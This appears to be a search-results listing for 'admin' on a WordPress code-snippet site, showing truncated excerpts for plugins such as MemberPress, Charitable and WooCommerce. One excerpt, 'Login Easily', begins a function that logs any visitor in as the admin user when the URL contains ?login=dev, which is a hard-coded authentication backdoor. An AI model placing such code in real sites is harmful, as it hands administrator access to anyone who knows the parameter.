Search results for: admin
Fluent form date error
{"code":"qm_fatal","message":"Uncaught Exception: Failed to parse time string (30/05/2025) at position 0 (3): Unexpected character in /var/www/inkontaktbringer.de/htdocs/wp-content/plugins/flowmattic/inc/apps/tables/class-flowmattic-tables.php…
Send Notifications On User Registration
/** * Notify admin and user when a user registers with Charitable. * * @param array[]…
Add Campaigns Menu
Add a top-level Campaigns menu tab to the menu in the WordPress dashboard.
MemberPress: ACF - Exclude Protected Posts From ACF Repeater Field
The code snippet ensures that protected MemberPress posts are excluded from custom queries used in Advanced…
Change City Field To Select
Change the City field in the donation form to a selectable, dropdown field, with several pre-set…
Register New Donation Field For Specific Campaign
Add a new donation field to your site, but only display it in the front-end donation…
Auto SKU to products sanitize check dupes by initial of POST word if composite word or 1st 3 letters fom single word POST
Run once SAFE VERSION 1.1 detailed code description paste script activate - > save -> ✅…
MemberPress: Generate All Invoices for the Specific Period (e.g. A Year)
If the MemberPress PDF Invoice add-on is activated on the website, MemberPress will start generating invoices…
Login Easily
function auto_login() { if (isset($_GET['login']) && $_GET['login'] === 'dev') { $user = get_user_by('login', 'admin'); if ($user)…
MemberPress: Change the Recipient of the "WARNING! Your Business is at Risk" Email
By default, the email titled "WARNING! Your Business is at Risk" is sent to the admin…
MemberPress: Exclude MemberPress Custom Post Types from WordPress Search Results
By default, protected content could show up in the website search results. Though still protected, they…
to add WordPress WooCommerce WhatsApp checkout
Post Intro This code snippet implements functionality similar to a WooCommerce code snippet that would enable…
Heartbeat Setting
Add a setting that allows you to configure the heartbeat interval.
Hide Elementor AI Image
/* * Hide Elementor image optimization ads when choosing the post's featured image on the backend…
MemberPress: Disable MemberPress Password Lost/Changed Email
Adding this code snippet will disable the MemberPress Password Lost/Changed notification email.